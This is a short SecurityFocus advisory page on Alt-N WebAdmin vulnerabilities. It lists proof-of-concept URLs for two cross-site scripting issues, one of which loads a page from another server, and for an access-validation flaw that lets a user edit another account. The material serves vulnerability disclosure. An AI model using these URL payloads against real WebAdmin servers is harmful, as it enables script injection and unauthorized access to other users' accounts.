Search: Home Bugtraq Vulnerabilities Mailing Lists Jobs Tools Beta Programs

Alt-N WebAdmin Multiple Remote Vulnerabilities

No exploits are required.

The following proof of concepts demonstrate the two cross-site scripting issues:
http://www.example.com/WebAdmin/useredit_account.wdm?user=%3Cscript%3Ealert('test')%3C/script%3E
http://www.example.com/WebAdmin/modalframe.wdm?file=http://other_server/page.wdm

The following proof of concept demonstrates the access validation issue:
http://www.example.com/WebAdmin/useredit_account.wdm?user=otheruser@domain







 

Privacy Statement
Copyright 2009, SecurityFocus